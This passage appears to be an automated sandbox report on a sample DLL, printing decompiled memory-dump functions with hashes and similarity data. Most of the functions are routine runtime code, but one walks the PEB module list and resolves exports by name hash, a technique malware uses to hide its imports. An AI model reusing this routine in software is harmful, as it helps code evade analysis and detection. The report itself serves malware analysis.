                				if((_t242 & 0x00000010) != 0) {
                					_t262 = 0xc000008f;
                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                				}
                				if((_t242 & 0x00000002) != 0) {
                					_t262 = 0xc0000093;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                				}
                				if((_t242 & 0x00000001) != 0) {
                					_t262 = 0xc0000091;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                				}
                				if((_t242 & 0x00000004) != 0) {
                					_t262 = 0xc000008e;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                				}
                				if((_t242 & 0x00000008) != 0) {
                					_t262 = 0xc0000090;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                				}
                				_t265 = _a8;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                				_t259 = E6EA5C09E(_a4);
                				if((_t259 & 0x00000001) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                				}
                				if((_t259 & 0x00000004) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                				}
                				if((_t259 & 0x00000008) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                				}
                				if((_t259 & 0x00000010) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                				}
                				if((_t259 & 0x00000020) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                				}
                				_t172 =  *_t265 & 0x00000c00;
                				if(_t172 == 0) {
                					 *_a4 =  *_a4 & 0xfffffffc;
                				} else {
                					if(_t172 == 0x400) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffd | 1;
                						L26:
                						 *_t257 = _t225;
                						L29:
                						_t175 =  *_t265 & 0x00000300;
                						if(_t175 == 0) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                							L35:
                							 *_t250 = _t178;
                							L36:
                							_t179 = _a4;
                							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                							if(_a28 == 0) {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t254 = _a4;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                								 *(_a4 + 0x50) =  *_t240;
                							} else {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                								 *(_a4 + 0x50) =  *_t240;
                							}
                							E6EA5C004(_t254);
                							RaiseException(_t262, 0, 1,  &_a4);
                							_t256 = _a4;
                							if((_t256[2] & 0x00000010) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffe;
                							}
                							if((_t256[2] & 0x00000008) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffb;
                							}
                							if((_t256[2] & 0x00000004) != 0) {
                								 *_t265 =  *_t265 & 0xfffffff7;
                							}
                							if((_t256[2] & 0x00000002) != 0) {
                								 *_t265 =  *_t265 & 0xffffffef;
                							}
                							if((_t256[2] & 0x00000001) != 0) {
                								 *_t265 =  *_t265 & 0xffffffdf;
                							}
                							_t195 =  *_t256 & 0x00000003;
                							if(_t195 == 0) {
                								 *_t265 =  *_t265 & 0xfffff3ff;
                							} else {
                								_t206 = _t195 - 1;
                								if(_t206 == 0) {
                									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                									L55:
                									 *_t265 = _t209;
                									L58:
                									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                									if(_t199 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                										L64:
                										 *_t265 = _t202;
                										L65:
                										if(_a28 == 0) {
                											 *_t240 = _t256[0x14];
                										} else {
                											 *_t240 = _t256[0x14];
                										}
                										return _t202;
                									}
                									_t203 = _t199 - 1;
                									if(_t203 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                										goto L64;
                									}
                									_t202 = _t203 - 1;
                									if(_t202 == 0) {
                										 *_t265 =  *_t265 & 0xfffff3ff;
                									}
                									goto L65;
                								}
                								_t210 = _t206 - 1;
                								if(_t210 == 0) {
                									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                									goto L55;
                								}
                								if(_t210 == 1) {
                									 *_t265 =  *_t265 | 0x00000c00;
                								}
                							}
                							goto L58;
                						}
                						if(_t175 == 0x200) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                							goto L35;
                						}
                						if(_t175 == 0x300) {
                							 *_a4 =  *_a4 & 0xffffffe3;
                						}
                						goto L36;
                					}
                					if(_t172 == 0x800) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                						goto L26;
                					}
                					if(_t172 == 0xc00) {
                						 *_a4 =  *_a4 | 0x00000003;
                					}
                				}
                			}
























                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EA5C673,?,?,00000008,?,?,6EA5C306,00000000), ref: 6EA5C8A5
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 3d397e7cfd56f16168b73e7fbfb3dd394d4c68a324a8215aa50ae1799851573c
                • Instruction ID: 4b3b5fdaef84bed8ef818aa48299ddf9d42cc0b185565d1e6bad38e44fbf86bf
                • Opcode Fuzzy Hash: 3d397e7cfd56f16168b73e7fbfb3dd394d4c68a324a8215aa50ae1799851573c
                • Instruction Fuzzy Hash: 15B15736210609DFD744CF68C496B547BE0FF05364F298698E8A9CF3A6C335E9A2CB44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA5817A() {
                				signed int _t3;
                
                				_t3 = GetProcessHeap();
                				 *0x6ea93f18 = _t3;
                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                			}





                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: ae1f2f4df97c31978ee8a4f46cc6f3f562931ae0971757b4405d4af96f365321
                • Instruction ID: 179f0be17826ba25e6e9d152ed4e44603ec73105ed6530e195a6c172a93eb4f7
                • Opcode Fuzzy Hash: ae1f2f4df97c31978ee8a4f46cc6f3f562931ae0971757b4405d4af96f365321
                • Instruction Fuzzy Hash: 16A01130200B008B8B008E30828C30A3AF8BA02280302C828A00AEE080EA2088828A80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E6EA54940(void* _a4, void* _a8, int _a12) {
                				void* _t100;
                				signed int _t102;
                				void _t110;
                				void _t111;
                				int _t113;
                				unsigned int _t114;
                				int _t115;
                				int _t125;
                				unsigned int _t126;
                				int _t127;
                				int _t129;
                				int _t134;
                				signed int _t140;
                				unsigned int _t144;
                				int _t145;
                				int _t147;
                				signed int _t153;
                				void* _t154;
                				signed int _t159;
                				void* _t163;
                				void* _t164;
                				void* _t165;
                				void* _t166;
                				intOrPtr* _t167;
                				void* _t176;
                
                				_t163 = _a8;
                				_t125 = _a12;
                				_t154 = _a4;
                				_t100 = _t163 + _t125;
                				if(_t154 <= _t163 || _t154 >= _t100) {
                					if(_t125 < 0x20) {
                						L73:
                						_t126 = _t125 & 0x0000001f;
                						__eflags = _t126;
                						if(_t126 != 0) {
                							_t102 = _t126;
                							_t127 = _t126 >> 2;
                							__eflags = _t127;
                							while(_t127 != 0) {
                								 *_t154 =  *_t163;
                								_t154 = _t154 + 4;
                								_t163 = _t163 + 4;
                								_t127 = _t127 - 1;
                								__eflags = _t127;
                							}
                							_t129 = _t102 & 0x00000003;
                							__eflags = _t129;
                							while(_t129 != 0) {
                								 *_t154 =  *_t163;
                								_t163 = _t163 + 1;
                								_t154 = _t154 + 1;
                								_t129 = _t129 - 1;
                								__eflags = _t129;
                							}
                						}
                						goto L79;
                					} else {
                						_t176 = _t125 - 0x80;
                						if(_t176 >= 0) {
                							asm("bt dword [0x6ea93acc], 0x1");
                							if(__eflags >= 0) {
                								__eflags = (_t154 ^ _t163) & 0x0000000f;
                								if(__eflags != 0) {
                									L10:
                									asm("bt dword [0x6ea93acc], 0x0");
                									if(__eflags >= 0) {
                										goto L35;
                									} else {
                										__eflags = _t154 & 0x00000003;
                										if((_t154 & 0x00000003) != 0) {
                											goto L35;
                										} else {
                											__eflags = _t163 & 0x00000003;
                											if(__eflags == 0) {
                												asm("bt edi, 0x2");
                												if(__eflags < 0) {
                													_t111 =  *_t163;
                													_t125 = _t125 - 4;
                													__eflags = _t125;
                													_t163 = _t163 + 4;
                													 *_t154 = _t111;
                													_t154 = _t154 + 4;
                												}
                												asm("bt edi, 0x3");
                												if(__eflags < 0) {
                													asm("movq xmm1, [esi]");
                													_t125 = _t125 - 8;
                													__eflags = _t125;
                													_t163 = _t163 + 8;
                													asm("movq [edi], xmm1");
                													_t154 = _t154 + 8;
                												}
                												__eflags = _t163 & 0x00000007;
                												if(__eflags == 0) {
                													asm("movdqa xmm1, [esi-0x8]");
                													_t164 = _t163 - 8;
                													do {
                														asm("movdqa xmm3, [esi+0x10]");
                														_t125 = _t125 - 0x30;
                														asm("movdqa xmm0, [esi+0x20]");
                														asm("movdqa xmm5, [esi+0x30]");
                														_t164 = _t164 + 0x30;
                														__eflags = _t125 - 0x30;
                														asm("movdqa xmm2, xmm3");
                														asm("palignr xmm3, xmm1, 0x8");
                														asm("movdqa [edi], xmm3");
                														asm("movdqa xmm4, xmm0");
                														asm("palignr xmm0, xmm2, 0x8");
                														asm("movdqa [edi+0x10], xmm0");
                														asm("movdqa xmm1, xmm5");
                														asm("palignr xmm5, xmm4, 0x8");
                														asm("movdqa [edi+0x20], xmm5");
                														_t154 = _t154 + 0x30;
                													} while (_t125 >= 0x30);
                													_t163 = _t164 + 8;
                												} else {
                													asm("bt esi, 0x3");
                													if(__eflags >= 0) {
                														asm("movdqa xmm1, [esi-0x4]");
                														_t165 = _t163 - 4;
                														do {
                															asm("movdqa xmm3, [esi+0x10]");
                															_t125 = _t125 - 0x30;
                															asm("movdqa xmm0, [esi+0x20]");
                															asm("movdqa xmm5, [esi+0x30]");
                															_t165 = _t165 + 0x30;
                															__eflags = _t125 - 0x30;
                															asm("movdqa xmm2, xmm3");
                															asm("palignr xmm3, xmm1, 0x4");
                															asm("movdqa [edi], xmm3");
                															asm("movdqa xmm4, xmm0");
                															asm("palignr xmm0, xmm2, 0x4");
                															asm("movdqa [edi+0x10], xmm0");
                															asm("movdqa xmm1, xmm5");
                															asm("palignr xmm5, xmm4, 0x4");
                															asm("movdqa [edi+0x20], xmm5");
                															_t154 = _t154 + 0x30;
                														} while (_t125 >= 0x30);
                														_t163 = _t165 + 4;
                														while(1) {
                															L28:
                															__eflags = _t125 - 0x10;
                															if(__eflags < 0) {
                																break;
                															}
                															asm("movdqu xmm1, [esi]");
                															_t125 = _t125 - 0x10;
                															_t163 = _t163 + 0x10;
                															asm("movdqa [edi], xmm1");
                															_t154 = _t154 + 0x10;
                														}
                														asm("bt ecx, 0x2");
                														if(__eflags < 0) {
                															_t110 =  *_t163;
                															_t125 = _t125 - 4;
                															__eflags = _t125;
                															_t163 = _t163 + 4;
                															 *_t154 = _t110;
                															_t154 = _t154 + 4;
                														}
                														asm("bt ecx, 0x3");
                														if(__eflags < 0) {
                															asm("movq xmm1, [esi]");
                															__eflags = _t125;
                															_t163 = _t163 + 8;
                															asm("movq [edi], xmm1");
                															_t154 = _t154 + 8;
                														}
                														goto __eax;
                													}
                													asm("movdqa xmm1, [esi-0xc]");
                													_t166 = _t163 - 0xc;
                													do {
                														asm("movdqa xmm3, [esi+0x10]");
                														_t125 = _t125 - 0x30;
                														asm("movdqa xmm0, [esi+0x20]");
                														asm("movdqa xmm5, [esi+0x30]");
                														_t166 = _t166 + 0x30;
                														__eflags = _t125 - 0x30;
                														asm("movdqa xmm2, xmm3");
                														asm("palignr xmm3, xmm1, 0xc");
                														asm("movdqa [edi], xmm3");
                														asm("movdqa xmm4, xmm0");
                														asm("palignr xmm0, xmm2, 0xc");
                														asm("movdqa [edi+0x10], xmm0");
                														asm("movdqa xmm1, xmm5");
                														asm("palignr xmm5, xmm4, 0xc");
                														asm("movdqa [edi+0x20], xmm5");
                														_t154 = _t154 + 0x30;
                													} while (_t125 >= 0x30);
                													_t163 = _t166 + 0xc;
                												}
                												goto L28;
                											}
                										}
                									}
                									goto L37;
                								} else {
                									asm("bt dword [0x6ea93010], 0x1");
                									if(__eflags < 0) {
                										_t113 = _t163 & 0x0000000f;
                										__eflags = _t113;
                										if(_t113 != 0) {
                											_push(_t125 - 0x10);
                											_t114 = 0x10 - _t113;
                											_t134 = _t114 & 0x00000003;
                											__eflags = _t134;
                											while(_t134 != 0) {
                												 *_t154 =  *_t163;
                												_t163 = _t163 + 1;
                												_t154 = _t154 + 1;
                												_t134 = _t134 - 1;
                												__eflags = _t134;
                											}
                											_t115 = _t114 >> 2;
                											__eflags = _t115;
                											while(_t115 != 0) {
                												 *_t154 =  *_t163;
                												_t163 = _t163 + 4;
                												_t154 = _t154 + 4;
                												_t115 = _t115 - 1;
                												__eflags = _t115;
                											}
                											_pop(_t125);
                										}
                										_t144 = _t125;
                										_t125 = _t125 & 0x0000007f;
                										_t145 = _t144 >> 7;
                										__eflags = _t145;
                										while(_t145 != 0) {
                											asm("movdqa xmm0, [esi]");
                											asm("movdqa xmm1, [esi+0x10]");
                											asm("movdqa xmm2, [esi+0x20]");
                											asm("movdqa xmm3, [esi+0x30]");
                											asm("movdqa [edi], xmm0");
                											asm("movdqa [edi+0x10], xmm1");
                											asm("movdqa [edi+0x20], xmm2");
                											asm("movdqa [edi+0x30], xmm3");
                											asm("movdqa xmm4, [esi+0x40]");
                											asm("movdqa xmm5, [esi+0x50]");
                											asm("movdqa xmm6, [esi+0x60]");
                											asm("movdqa xmm7, [esi+0x70]");
                											asm("movdqa [edi+0x40], xmm4");
                											asm("movdqa [edi+0x50], xmm5");
                											asm("movdqa [edi+0x60], xmm6");
                											asm("movdqa [edi+0x70], xmm7");
                											_t163 = _t163 + 0x80;
                											_t154 = _t154 + 0x80;
                											_t145 = _t145 - 1;
                											__eflags = _t145;
                										}
                										goto L69;
                									} else {
                										goto L10;
                									}
                								}
                							} else {
                								memcpy(_t154, _t163, _t125);
                								return _a4;
                							}
                						} else {
                							asm("bt dword [0x6ea93010], 0x1");
                							if(_t176 < 0) {
                								L69:
                								__eflags = _t125;
                								if(_t125 != 0) {
                									_t147 = _t125 >> 5;
                									__eflags = _t147;
                									if(_t147 != 0) {
                										do {
                											asm("movdqu xmm0, [esi]");
                											asm("movdqu xmm1, [esi+0x10]");
                											asm("movdqu [edi], xmm0");
                											asm("movdqu [edi+0x10], xmm1");
                											_t163 = _t163 + 0x20;
                											_t154 = _t154 + 0x20;
                											_t147 = _t147 - 1;
                											__eflags = _t147;
                										} while (_t147 != 0);
                									}
                									goto L73;
                								}
                								L79:
                								return _a4;
                							} else {
                								L35:
                								while((_t154 & 0x00000003) != 0) {
                									 *_t154 =  *_t163;
                									_t125 = _t125 - 1;
                									_t163 = _t163 + 1;
                									_t154 = _t154 + 1;
                								}
                								L37:
                								_t140 = _t125;
                								if(_t125 < 0x20) {
                									goto L73;
                								} else {
                									memcpy(_t154, _t163, _t125 >> 2 << 2);
                									switch( *((intOrPtr*)((_t140 & 0x00000003) * 4 +  &M6EA54BA4))) {
                										case 0:
                											return _a4;
                											goto L85;
                										case 1:
                											 *__edi =  *__esi;
                											__eax = _a4;
                											return _a4;
                											goto L85;
                										case 2:
                											 *__edi =  *__esi;
                											_t46 = __esi + 1; // 0x45c70cc4
                											 *((char*)(__edi + 1)) =  *_t46;
                											__eax = _a4;
                											return _a4;
                											goto L85;
                										case 3:
                											 *__edi =  *__esi;
                											 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
                											 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
                											__eax = _a4;
                											return _a4;
                											goto L85;
                									}
                								}
                							}
                						}
                					}
                				} else {
                					_t167 = _t163 + _t125;
                					_t159 = _t154 + _t125;
                					__eflags = _t125 - 0x20;
                					if(__eflags < 0) {
                						L60:
                						__eflags = _t125 & 0xfffffffc;
                						while((_t125 & 0xfffffffc) != 0) {
                							_t159 = _t159 - 4;
                							_t167 = _t167 - 4;
                							 *_t159 =  *_t167;
                							_t125 = _t125 - 4;
                							__eflags = _t125 & 0xfffffffc;
                						}
                						__eflags = _t125;
                						if(_t125 != 0) {
                							do {
                								_t159 = _t159 - 1;
                								_t167 = _t167 - 1;
                								 *_t159 =  *_t167;
                								_t125 = _t125 - 1;
                								__eflags = _t125;
                							} while (_t125 != 0);
                						}
                						return _a4;
                					} else {
                						asm("bt dword [0x6ea93010], 0x1");
                						if(__eflags < 0) {
                							__eflags = _t159 & 0x0000000f;
                							if((_t159 & 0x0000000f) != 0) {
                								do {
                									_t125 = _t125 - 1;
                									_t167 = _t167 - 1;
                									_t159 = _t159 - 1;
                									 *_t159 =  *_t167;
                									__eflags = _t159 & 0x0000000f;
                								} while ((_t159 & 0x0000000f) != 0);
                								while(1) {
                									L56:
                									__eflags = _t125 - 0x80;
                									if(_t125 < 0x80) {
                										break;
                									}
                									_t167 = _t167 - 0x80;
                									_t159 = _t159 - 0x80;
                									asm("movdqu xmm0, [esi]");
                									asm("movdqu xmm1, [esi+0x10]");
                									asm("movdqu xmm2, [esi+0x20]");
                									asm("movdqu xmm3, [esi+0x30]");
                									asm("movdqu xmm4, [esi+0x40]");
                									asm("movdqu xmm5, [esi+0x50]");
                									asm("movdqu xmm6, [esi+0x60]");
                									asm("movdqu xmm7, [esi+0x70]");
                									asm("movdqu [edi], xmm0");
                									asm("movdqu [edi+0x10], xmm1");
                									asm("movdqu [edi+0x20], xmm2");
                									asm("movdqu [edi+0x30], xmm3");
                									asm("movdqu [edi+0x40], xmm4");
                									asm("movdqu [edi+0x50], xmm5");
                									asm("movdqu [edi+0x60], xmm6");
                									asm("movdqu [edi+0x70], xmm7");
                									_t125 = _t125 - 0x80;
                									__eflags = _t125 & 0xffffff80;
                									if((_t125 & 0xffffff80) != 0) {
                										continue;
                									}
                									break;
                								}
                								__eflags = _t125 - 0x20;
                								if(_t125 >= 0x20) {
                									do {
                										_t167 = _t167 - 0x20;
                										_t159 = _t159 - 0x20;
                										asm("movdqu xmm0, [esi]");
                										asm("movdqu xmm1, [esi+0x10]");
                										asm("movdqu [edi], xmm0");
                										asm("movdqu [edi+0x10], xmm1");
                										_t125 = _t125 - 0x20;
                										__eflags = _t125 & 0xffffffe0;
                									} while ((_t125 & 0xffffffe0) != 0);
                								}
                								goto L60;
                							}
                							goto L56;
                						} else {
                							__eflags = _t159 & 0x00000003;
                							if((_t159 & 0x00000003) != 0) {
                								_t153 = _t159 & 0x00000003;
                								_t125 = _t125 - _t153;
                								__eflags = _t125;
                								do {
                									 *(_t159 - 1) =  *((intOrPtr*)(_t167 - 1));
                									_t167 = _t167 - 1;
                									_t159 = _t159 - 1;
                									_t153 = _t153 - 1;
                									__eflags = _t153;
                								} while (_t153 != 0);
                							}
                							__eflags = _t125 - 0x20;
                							if(_t125 < 0x20) {
                								goto L60;
                							} else {
                								asm("std");
                								memcpy(_t159 - 4, _t167 - 4, _t125 >> 2 << 2);
                								asm("cld");
                								switch( *((intOrPtr*)((_t125 & 0x00000003) * 4 +  &M6EA54C50))) {
                									case 0:
                										return _a4;
                										goto L85;
                									case 1:
                										 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
                										__eax = _a4;
                										return _a4;
                										goto L85;
                									case 2:
                										_t67 = __esi + 3; // 0xbc45c7
                										 *((char*)(__edi + 3)) =  *_t67;
                										_t69 = __esi + 2; // 0xbc45c70c
                										 *((char*)(__edi + 2)) =  *_t69;
                										__eax = _a4;
                										return _a4;
                										goto L85;
                									case 3:
                										 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
                										 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
                										 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
                										__eax = _a4;
                										return _a4;
                										goto L85;
                								}
                							}
                						}
                					}
                				}
                				L85:
                			}




























                0x6ea54c6e
                0x6ea54c74
                0x00000000
                0x00000000
                0x6ea54c78
                0x6ea54c7b
                0x6ea54c7e
                0x6ea54c81
                0x6ea54c84
                0x6ea54c8a
                0x00000000
                0x00000000
                0x6ea54c8f
                0x6ea54c95
                0x6ea54c9b
                0x6ea54c9e
                0x6ea54ca4
                0x00000000
                0x00000000
                0x6ea54c48
                0x6ea54c30
                0x6ea54c0b
                0x6ea54bfd
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbf32378b5f77422ebbea402f7eeccf808f14736dceac520f5e89fdf65af6515
                • Instruction ID: 4dd6fe6100b262df6d75350f7b995137869d3b56d68061122ad4e6bf22d6a931
                • Opcode Fuzzy Hash: dbf32378b5f77422ebbea402f7eeccf808f14736dceac520f5e89fdf65af6515
                • Instruction Fuzzy Hash: 37F1E136918B838AE7268F7C94012A5FBB1BFD6310F149B1DDDE663E05D730A666C384
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c36526dba21685467946f954465a6d5da905229e5f77774c9a4601c79bcee020
                • Instruction ID: a966cd55c2ed89a9136d6a0574332799a764d18da6d111e2994b0711d5c58972
                • Opcode Fuzzy Hash: c36526dba21685467946f954465a6d5da905229e5f77774c9a4601c79bcee020
                • Instruction Fuzzy Hash: 68E1BC71A00206CFCB54CF99C890BA9B7F1FF89314F2981A9D845AB349D335EDA5CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA528D0(intOrPtr __ecx, intOrPtr __edx) {
                				intOrPtr _v8;
                				intOrPtr* _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _t48;
                				intOrPtr* _t51;
                				signed int _t53;
                				signed int _t66;
                				intOrPtr* _t67;
                				signed char _t68;
                				intOrPtr _t70;
                				signed int _t74;
                				intOrPtr _t80;
                				signed int _t81;
                				intOrPtr _t82;
                				signed int _t84;
                				signed short* _t88;
                				signed int _t89;
                				signed short _t90;
                				intOrPtr* _t92;
                
                				_v20 = __ecx;
                				_v24 = __edx;
                				_t67 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                				_t70 =  *((intOrPtr*)(_t67 + 0x18));
                				_v8 = _t70;
                				if(_t70 == 0) {
                					L16:
                					return 0;
                				} else {
                					do {
                						_t88 =  *(_t67 + 0x30);
                						_t67 =  *_t67;
                						_v28 = _t67;
                						_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x3c)) + _t70 + 0x78));
                						if(_t48 != 0) {
                							_t90 =  *_t88 & 0x0000ffff;
                							_t80 = _t48 + _t70;
                							_v16 =  *((intOrPtr*)(_t80 + 0x18));
                							_v32 = _t80;
                							_t51 =  *((intOrPtr*)(_t80 + 0x20)) + _t70;
                							_t81 = 0;
                							_v12 = _t51;
                							if(_t90 != 0) {
                								do {
                									_t18 = _t90 + 0x20; // 0x20
                									_t88 =  &(_t88[1]);
                									_t78 =  >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff;
                									_t64 = ( >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff) & 0x0000ffff;
                									_t81 = _t81 * 0x00000101 + (( >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff) & 0x0000ffff) ^ (( >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff) & 0x0000ffff) << 0x00000010;
                									_t66 =  *_t88 & 0x0000ffff;
                									_t90 = _t66;
                								} while (_t66 != 0);
                								_t51 = _v12;
                								_t70 = _v8;
                							}
                							if(_t81 == _v20) {
                								_t82 = _v16;
                								_t89 = 0;
                								if(_t82 != 0) {
                									do {
                										_t92 =  *_t51 + _t70;
                										_v12 = _t51 + 4;
                										_t53 = 0;
                										_t68 =  *_t92;
                										if(_t68 != 0) {
                											do {
                												_t84 = _t68 + 0x00000020 & 0x000000ff;
                												_t92 = _t92 + 1;
                												_t74 = _t68 & 0x000000ff;
                												_t68 =  *_t92;
                												_t85 =  >=  ? _t74 : _t84;
                												_t75 =  >=  ? _t74 : _t84;
                												_t53 = _t53 * 0x00000101 + ( >=  ? _t74 : _t84) ^ ( >=  ? _t74 : _t84) << 0x00000010;
                											} while (_t68 != 0);
                											_t70 = _v8;
                											_t82 = _v16;
                										}
                										if(_t53 == _v24) {
                											return  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0x1c)) + ( *( *((intOrPtr*)(_v32 + 0x24)) + _t89 * 2 + _t70) & 0x0000ffff) * 4 + _v8)) + _v8;
                										} else {
                											goto L13;
                										}
                										goto L18;
                										L13:
                										_t51 = _v12;
                										_t89 = _t89 + 1;
                									} while (_t89 < _t82);
                									_t67 = _v28;
                								}
                							}
                						}
                						goto L15;
                						L15:
                						_t70 =  *((intOrPtr*)(_t67 + 0x18));
                						_v8 = _t70;
                					} while (_t70 != 0);
                					goto L16;
                				}
                				L18:
                			}



























                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 92ec9c83119875facca7ea43f8b2af49efdd29c7f4825bbfbf1e15f0a9a40edc
                • Instruction ID: bc8f0ce6184db342948e73c0b1c9ff55d230757c05aaee6c757b1d5654d4b416
                • Opcode Fuzzy Hash: 92ec9c83119875facca7ea43f8b2af49efdd29c7f4825bbfbf1e15f0a9a40edc
                • Instruction Fuzzy Hash: 3E419D76B00116CFDB48CF99C490AA9B7F1FF89310B1985AED895AB345D730ED91CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E6EA56AEE(void* __ecx) {
                				char _v8;
                				void* __esi;
                				intOrPtr _t7;
                				char _t13;
                
                				_push(__ecx);
                				_t13 = 0;
                				_v8 = 0;
                				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                				_t16 =  *((intOrPtr*)(_t7 + 8));
                				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                					L2:
                					_t13 = 1;
                				} else {
